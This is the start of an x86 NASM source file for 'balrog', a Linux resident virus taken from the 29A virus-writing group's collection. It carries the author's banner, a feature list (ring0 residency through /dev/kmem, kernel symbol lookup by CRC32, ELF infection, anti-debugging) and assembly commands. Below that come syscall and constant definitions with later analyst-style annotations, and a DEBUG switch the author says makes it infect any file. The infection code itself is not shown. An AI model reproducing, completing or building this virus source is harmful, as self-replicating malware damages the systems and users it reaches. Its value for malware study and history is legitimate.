
📄 29a-7.010

📁 从29A上收集的病毒源码

;                                                       _
;                                                              _( (~\
;       _ _                        /    hAckniX               ( \> > \
;   -/~/ / ~\                     :;   PienSteVo    \       _  > /(~\/
;  || | | /\ ;\                   |l      _____     |;     ( \/    > >
;  _\\)\)\)/ ;;;                  `8o __-~     ~\   d|      \      //
; ///(())(__/~;;\                  "88p;.  -. _\_;.oP        (_._/ /
;(((__   __ \\   \                  `>,% (\  (\./)8"         ;:'  i
;)))--`.'-- (( ;,8 \               ,;%%%:  ./V^^^V'          ;.   ;.
;((\   |   /)) .,88  `: ..,,;;;;,-::::::'_::\   ||\         ;[8:   ;
; )|  ~-~  |(|(888; ..``'::::8888oooooo.  :\`^^^/,,~--._    |88::  |
; |\ -===- /|  \8;; ``:.      oo.8888888888:`((( o.ooo8888Oo;:;:'  |
; |_~-___-~_|   `-\.   `        `o`88888888b` )) 888b88888P""'     ;
; ; ~~~~;~~         "`--_`.       b`888888888;(.,"888b888"  ..::;-'
;   ;      ;              ~"-....  b`8888888:::::.`8888. .:;;;''
;      ;    ;                 `:::. `:::OOO:::::::.`OO' ;;;''
; :       ;                     `.      "``::::::''    .'
;    ;                           `.   \_              /
;  ;       ;                       +:   ~~--  `:'  -';
;                                   `:         : .::/
;      ;   How'd ya like that?      ;;+_  :::. :..;;;
;                                   ;;;;;;,;;;;;;;;,;
;
; this is the first version of balrog resident virus
; the resident mechanism is inspired by the (wonderful) staog virus
; I played with kernel symbols only to demonstrate the use
; of exported kernel symbolz
;
; the total size of the virus is not optimized
; I prefer to write source which is more readable
;
;	features of this virus are:
;		- resident in ring0 mode ( accessing by /dev/kmem )
;		- using exported kernel symbols
;		- retrieving kernel API with crc32
;		- elf infection without temporary file
;		- antidebugging ( detecting if task is traced )
;
; to Assemble it:
;	nasm -f elf balrog.asm
;	ld -o balrog balrog.o

; Target: 32-bit x86 (the header's build line uses `nasm -f elf`).
; Everything in this run is assemble-time configuration: directives and
; single-line text macros only, no instruction is emitted here.
bits 32
global _start

section .text

	; Syscall numbers. The values match the Linux i386 syscall table; the
	; invocation sequence itself is outside this excerpt.
	; Triage note: taken together with the header (residency through
	; /dev/kmem, exported kernel symbols), this set points at 2.4-era
	; kernels. get_kernel_syms was removed in Linux 2.6 and /dev/kmem is
	; restricted or absent on current kernels (removed in Linux 5.13).
	%define SYS_exit 1
	%define SYS_read 3
	%define SYS_write 4
	%define SYS_open 5
	%define SYS_close 6
	%define SYS_execve 11
	; 19 is lseek in the i386 table; SYS_seek is the author's own name.
	%define SYS_seek 19
	; The header lists "detecting if task is traced" as a feature;
	; presumably this is the call behind it -- call site not visible here.
	%define SYS_ptrace 26
	%define SYS_brk 45
	; NOTE(review): why sethostname is needed cannot be told from this
	; excerpt -- confirm at the use site.
	%define SYS_sethostname 74
	%define SYS_munmap 91
	; 109 is the legacy olduname slot on i386 (uname proper is 122).
	%define SYS_uname 109
	; 125 is mprotect on i386; SYS_deprotect is the author's own name.
	%define SYS_deprotect 125
	; get_kernel_syms: present only up to Linux 2.4.
	%define SYS_get_kernel_syms 130
	; if u want to infect any file, put DEBUG to 0
	; for demonstration only debug = 1
	; then files to infect are filtred by sz_filter
	; (DEBUG and sz_filter are consumed outside this excerpt.)
	%define DEBUG 1
	; Expands to the one-byte breakpoint trap; a development aid wherever
	; ___BREAK___ is written in the body.
	%define ___BREAK___ int 3
	;crc32 calculation
	; Two 32-bit constants for the CRC32-based kernel API lookup the header
	; mentions. Which role each plays (polynomial, seed, ...) is not visible
	; here -- TODO confirm against the routine that uses them.
	%define CRC32_ 0C1A7F39Ah
	%define CRC32_init 09C3B248Eh

	; Text macros, not values: OF / KOF expand to `ebp - delta` and
	; `ebp - delta_ring0`. Both labels are defined outside this excerpt.
	; Presumably written inside [ ] so that ebp serves as a runtime base
	; for position-independent data access -- confirm at the use sites.
	%define OF ebp - delta		; offset in user space
	%define KOF ebp - delta_ring0	; offset in kernel space

;-
